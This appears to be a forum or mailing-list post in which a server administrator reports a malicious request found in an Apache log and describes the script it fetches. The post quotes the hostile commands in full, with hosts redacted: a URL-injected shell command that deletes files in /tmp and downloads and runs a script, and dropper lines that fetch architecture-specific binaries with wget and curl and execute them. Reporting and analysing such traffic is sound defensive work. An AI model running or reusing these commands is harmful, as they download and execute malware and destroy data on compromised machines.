28 May
2021
28 May
'21
8:01 p.m.
Saw a line like this pop up in the Apache log on my public-facing server from yesterday: "GET /shell?cd+/tmp;rm+-rf+*;wget+ «redacted»/jaws;sh+/tmp/jaws" I checked, and the file it is trying to fetch and execute still exists. It consists of about a dozen lines, all of this form: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget «redacted»/z0r0.«ext»; curl -O «redacted»/z0r0.«ext»; cat z0r0.«ext» >zeros6x; chmod +x *; ./zeros6x jaws.exploit all differing only in «ext», with values like “mips” and “mpsl” and “ppc”, “arm”, “arm5”, “arm6”, “arm7”, even “m68k”, plus of course “x86” and “i686”.